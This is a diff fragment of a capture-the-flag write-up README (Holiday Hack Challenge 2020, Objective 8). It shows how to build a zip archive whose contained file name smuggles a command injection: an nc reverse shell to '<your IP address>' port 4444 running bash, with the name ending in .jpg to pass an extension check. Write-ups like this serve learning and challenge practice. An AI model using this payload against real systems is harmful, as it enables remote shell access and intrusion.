joergschwarzwaelder/hhc2020/Objective-8/README.md

 touch joergen.jpg
 zip joergen.zip joergen.jpg
 ```
-Modify the contained filename to one with the shell command for the reverse shell (filename needs to end with an ima:
+Modify the contained filename to one with the shell command for the reverse shell (filename needs to end with an image extention as the application checks for that):
 ```
 printf "@ joergen.jpg\n@=\';nc <your IP address> 4444 -e \`which bash\`;#'.jpg\n" | zipnote -w joergen.zip
 ```